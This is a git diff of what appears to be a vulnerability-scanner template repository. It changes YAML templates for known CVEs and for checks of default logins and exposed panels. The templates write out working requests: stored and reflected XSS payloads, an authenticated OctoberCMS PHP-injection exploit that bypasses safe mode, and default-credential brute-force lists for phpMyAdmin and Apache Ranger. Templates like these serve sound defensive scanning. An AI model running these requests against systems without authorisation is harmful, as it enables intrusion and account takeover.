-    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 4.8
-    cve-id: CVE-2021-46069
-    cwe-id: CWE-79
-  metadata:
-    verified: "true"
-  tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_mechanic HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
-
-      - |
-        GET /admin/?page=mechanics HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+id: CVE-2021-46069
+
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_mechanic HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
+
+      - |
+        GET /admin/?page=mechanics HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
diff --git a/cves/2021/CVE-2021-46071.yaml b/cves/2021/CVE-2021-46071.yaml
index adba6138a8..ef8b1e2fd5 100644
--- a/cves/2021/CVE-2021-46071.yaml
+++ b/cves/2021/CVE-2021-46071.yaml
@@ -1,5 +1,5 @@
-id: CVE-2021-46071
-
+id: CVE-2021-46071
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_category HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
-
-      - |
-        GET /admin/?page=maintenance/category HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/category HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
diff --git a/cves/2021/CVE-2021-46072.yaml b/cves/2021/CVE-2021-46072.yaml
index cb84dbf0ef..b80b903554 100644
--- a/cves/2021/CVE-2021-46072.yaml
+++ b/cves/2021/CVE-2021-46072.yaml
@@ -1,5 +1,5 @@
-id: CVE-2021-46072
-
+id: CVE-2021-46072
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Master.php?f=save_service HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
-
-      - |
-        GET /admin/?page=maintenance/services HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_service HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/services HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
diff --git a/cves/2021/CVE-2021-46073.yaml b/cves/2021/CVE-2021-46073.yaml
index 60bef12a26..97da2817df 100644
--- a/cves/2021/CVE-2021-46073.yaml
+++ b/cves/2021/CVE-2021-46073.yaml
@@ -1,5 +1,5 @@
-id: CVE-2021-46073
-
+id: CVE-2021-46073
+
 info:
   name: Vehicle Service Management System - Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
-
-      - |
-        GET /vehicle_service/admin/?page=user/list HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
+
+      - |
+        GET /vehicle_service/admin/?page=user/list HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
+        condition: and
diff --git a/cves/2022/CVE-2022-0594.yaml b/cves/2022/CVE-2022-0594.yaml
index ae9bc5bec2..6b8297435d 100644
--- a/cves/2022/CVE-2022-0594.yaml
+++ b/cves/2022/CVE-2022-0594.yaml
@@ -1,4 +1,4 @@
-id: CVE-2022-0594
+id: CVE-2022-0594
 
 info:
   name: Shareaholic < 9.7.6 - Information Disclosure
@@ -17,26 +17,26 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
-
-    matchers-condition: and
-    matchers:
-
-      - type: word
-        part: body
-        words:
-          - 'plugin_version'
-          - 'shareaholic_server_reachable'
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - 'plugin_version'
+          - 'shareaholic_server_reachable'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index d021cc25a2..209d4d8f64 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -7,7 +7,7 @@ info:
   description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
   reference:
     - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
-    - https://www.cvedetails.com/cve/CVE-2022-0692
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0692
     - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203
     - https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a
   classification:
diff --git a/cves/2022/CVE-2022-21705.yaml b/cves/2022/CVE-2022-21705.yaml
index 397ba79309..b51fabc2db 100644
--- a/cves/2022/CVE-2022-21705.yaml
+++ b/cves/2022/CVE-2022-21705.yaml
@@ -1,107 +1,107 @@
-id: CVE-2022-21705
-
-info:
-  name: OctoberCMS Authenticated Remote Code Execution
-  author: iPhantasmic
-  severity: high
-  description: |
-    Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
-  remediation: |
-    The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
-  reference:
-    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
-    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
-    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.2
-    cve-id: CVE-2022-21705
-    cwe-id: CWE-74
-  tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
-
-
-requests:
-  - raw:
-      - | # to obtain session_key and token
-        GET /backend/backend/auth/signin HTTP/1.1
-        Host: {{Hostname}}
-
-      - | # to perform authentication and obtain admin cookies
-        POST /backend/backend/auth/signin HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
-
-      - | # to inject php code in Markup editor and perform exploit
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onSave
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
-        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
-
-      - | # to obtain theme
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
-        _session_key={{session_key}}&_token={{token}}&search=&type=page
-
-      - | # to access the template page for generated exploit
-        POST /backend/cms HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
-        X-OCTOBER-REQUEST-PARTIALS:
-        X-Requested-With: XMLHttpRequest
-
-        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
-
-    cookie-reuse: true
-
-    extractors:
-      - type: xpath
-        name: session_key
-        attribute: value
-        xpath:
-          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
-        internal: true
-        # Obtain _session_key for current OctoberCMS session
-
-      - type: xpath
-        name: token
-        attribute: value
-        xpath:
-          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
-        internal: true
-        # Obtain _token for current OctoberCMS session
-
-      - type: regex
-        name: theme
-        part: body
-        group: 1
-        regex:
-          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
-        internal: true
-        # Obtain current theme used for Markup editor of OctoberCMS
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - 'function onInit()'
-          - 'phpinfo()'
-          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
-        condition: and
-        # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
-
-      - type: status
-        status:
-          - 200
+id: CVE-2022-21705
+
+info:
+  name: OctoberCMS Authenticated Remote Code Execution
+  author: iPhantasmic
+  severity: high
+  description: |
+    Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
+  remediation: |
+    The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
+  reference:
+    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
+    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
+    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-21705
+    cwe-id: CWE-74
+  tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
+
+
+requests:
+  - raw:
+      - | # to obtain session_key and token
+        GET /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+
+      - | # to perform authentication and obtain admin cookies
+        POST /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
+
+      - | # to inject php code in Markup editor and perform exploit
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onSave
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
+
+      - | # to obtain theme
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&type=page
+
+      - | # to access the template page for generated exploit
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
+
+    cookie-reuse: true
+
+    extractors:
+      - type: xpath
+        name: session_key
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
+        internal: true
+        # Obtain _session_key for current OctoberCMS session
+
+      - type: xpath
+        name: token
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
+        internal: true
+        # Obtain _token for current OctoberCMS session
+
+      - type: regex
+        name: theme
+        part: body
+        group: 1
+        regex:
+          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
+        internal: true
+        # Obtain current theme used for Markup editor of OctoberCMS
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'function onInit()'
+          - 'phpinfo()'
+          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
+        condition: and
+        # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-38463.yaml b/cves/2022/CVE-2022-38463.yaml
index 1d86156944..f1b13c4d99 100644
--- a/cves/2022/CVE-2022-38463.yaml
+++ b/cves/2022/CVE-2022-38463.yaml
@@ -1,5 +1,5 @@
-id: CVE-2022-38463
-
+id: CVE-2022-38463
+
 info:
   name: ServiceNow - Cross Site Scripting
   author: amanrawat
@@ -18,23 +18,23 @@ info:
     shodan-query: http.title:"ServiceNow"
     verified: "true"
   tags: cve,cve2022,servicenow,xss
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "top.location.href = 'javascript:alert(document.domain)';"
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "top.location.href = 'javascript:alert(document.domain)';"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/apache/ranger-default-login.yaml b/default-logins/apache/ranger-default-login.yaml
index 5edd99329e..34e46cbd76 100644
--- a/default-logins/apache/ranger-default-login.yaml
+++ b/default-logins/apache/ranger-default-login.yaml
@@ -1,39 +1,39 @@
-id: ranger-default-login
+id: ranger-default-login
 
-info:
-  name: Apache Ranger Default Login
-  author: For3stCo1d
-  severity: high
-  reference: https://github.com/apache/ranger
-  metadata:
-    shodan-query: http.title:"Ranger - Sign In"
-  tags: apache,ranger,default-login
+info:
+  name: Apache Ranger Default Login
+  author: For3stCo1d
+  severity: high
+  reference: https://github.com/apache/ranger
+  metadata:
+    shodan-query: http.title:"Ranger - Sign In"
+  tags: apache,ranger,default-login
 
-requests:
-  - raw:
-      - |
-        POST /login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{user}}&password={{pass}}
-
-    attack: pitchfork
-    payloads:
-      user:
-        - admin
-      pass:
-        - admin
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"statusCode":200'
-          - '"msgDesc":"Login Successful"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{user}}&password={{pass}}
+
+    attack: pitchfork
+    payloads:
+      user:
+        - admin
+      pass:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"statusCode":200'
+          - '"msgDesc":"Login Successful"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
index 43200c89d1..6ee0117dde 100644
--- a/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
+++ b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml
@@ -1,73 +1,73 @@
-id: phpmyadmin-default-login
-
-info:
-  name: phpMyAdmin Default Login
-  author: Natto97
-  severity: high
-  description: phpMyAdmin default admin credentials were discovered
-  reference:
-    - https://www.phpmyadmin.net
-  metadata:
-    verified: true
-    shodan-query: http.title:phpMyAdmin
-  tags: default-login,phpmyadmin
-
-
-requests:
-  - raw:
-      - |
-        GET /index.php HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        POST /index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        Cookie: phpMyAdmin={{token2}}; pma_lang=en
-
-        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
-
-    attack: clusterbomb
-    payloads:
-      user:
-        - root
-        - mysql
-      password:
-        - 123456
-        - root
-        - mysql
-        - toor
-
-    extractors:
-      - type: regex
-        name: token
-        internal: true
-        group: 1
-        regex:
-          - 'name="token" value="([0-9a-z]+)"'
-
-      - type: regex
-        name: token2
-        internal: true
-        group: 1
-        regex:
-          - 'name="set_session" value="([0-9a-z]+)"'
-
-      - type: regex
-        name: session
-        part: header
-        internal: true
-        group: 1
-        regex:
-          - "phpMyAdmin=([0-9a-z]+)"
-
-    req-condition: true
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
-          - status_code_2 == 302
-          - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
-        condition: and
+id: phpmyadmin-default-login
+
+info:
+  name: phpMyAdmin Default Login
+  author: Natto97
+  severity: high
+  description: phpMyAdmin default admin credentials were discovered
+  reference:
+    - https://www.phpmyadmin.net
+  metadata:
+    verified: true
+    shodan-query: http.title:phpMyAdmin
+  tags: default-login,phpmyadmin
+
+
+requests:
+  - raw:
+      - |
+        GET /index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: phpMyAdmin={{token2}}; pma_lang=en
+
+        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
+
+    attack: clusterbomb
+    payloads:
+      user:
+        - root
+        - mysql
+      password:
+        - 123456
+        - root
+        - mysql
+        - toor
+
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - 'name="token" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: token2
+        internal: true
+        group: 1
+        regex:
+          - 'name="set_session" value="([0-9a-z]+)"'
+
+      - type: regex
+        name: session
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - "phpMyAdmin=([0-9a-z]+)"
+
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
+          - status_code_2 == 302
+          - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
+        condition: and
diff --git a/exposed-panels/beyondtrust-login-server.yaml b/exposed-panels/beyondtrust-login-server.yaml
index 3ac61f0d06..43746ede00 100644
--- a/exposed-panels/beyondtrust-login-server.yaml
+++ b/exposed-panels/beyondtrust-login-server.yaml
@@ -1,31 +1,31 @@
-id: beyondtrust-login-server
+id: beyondtrust-login-server
 
-info:
-  name: BeyondTrust PAM login Server
-  author: r3dg33k,nuk3s3c
-  severity: info
-  tags: beyondtrust,pam,panel
+info:
+  name: BeyondTrust PAM login Server
+  author: r3dg33k,nuk3s3c
+  severity: info
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        regex:
-          - '"DomainName":"(.*)"'
-          - '"domains":'
-        condition: and
-
-    extractors:
-      - type: json
-        part: body
-        json:
-          - ".domains[] | .DomainName"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/api/security/auth/loginServers'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - '"DomainName":"(.*)"'
+          - '"domains":'
+        condition: and
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - ".domains[] | .DomainName"
           - ".domains[] | .ldapservers"
\ No newline at end of file
diff --git a/exposed-panels/beyondtrust-panel.yaml b/exposed-panels/beyondtrust-panel.yaml
index 06a08998fd..5f024e105e 100644
--- a/exposed-panels/beyondtrust-panel.yaml
+++ b/exposed-panels/beyondtrust-panel.yaml
@@ -1,21 +1,21 @@
-id: beyondtrust-panel
+id: beyondtrust-panel
 
-info:
-  name: BeyondTrust Login Panel
-  author: r3dg33k,nuk3s3c
-  severity: info
-  description: Detects default Login page for Beyond Trust PAM solution
-  metadata:
-    shodan-query: http.html:"BeyondInsight"
-  tags: beyondtrust,pam,panel
+info:
